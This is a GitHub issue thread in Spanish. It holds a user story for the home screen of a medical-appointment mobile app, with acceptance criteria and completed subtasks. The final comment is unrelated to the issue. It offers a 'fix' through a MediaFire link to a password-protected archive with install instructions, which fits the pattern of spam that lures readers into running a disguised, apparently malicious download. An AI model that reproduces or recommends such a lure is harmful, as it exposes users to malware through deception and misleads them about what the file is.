### ISSUE TITLE
#US01: Pantalla de Inicio

### ISSUE THREAD

**Issue by leandros1793** [ReservasMedicasMobile/ReservasMedicasMobile#13]
Como usuario quiero visualizar una pantalla de inicio en la aplicación móvil con información del sistema para familiarizarme con su uso.

**Criterios de aceptación:**
- Dado que soy un usuario que ha abierto la aplicación móvil, cuando inicio la aplicación entonces la pantalla de inicio debe cargarse correctamente y mostrar información básica del sistema.
- Dado que soy un usuario que utiliza varios dispositivos móviles con diferentes tamaños de pantalla cuando la pantalla de inicio se carga, entonces el diseño debe ajustarse de manera correcta, asegurando que la información se vea correctamente en dispositivos de diferentes tamaños.
- Dado que soy un usuario que interactúa con la pantalla de inicio cuando navego a través de los elementos en la pantalla entonces la aplicación debe tener una interfaz clara y fácil de usar.

### Tareas:
- [x] #14
- [x] #15
- [x] #16

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
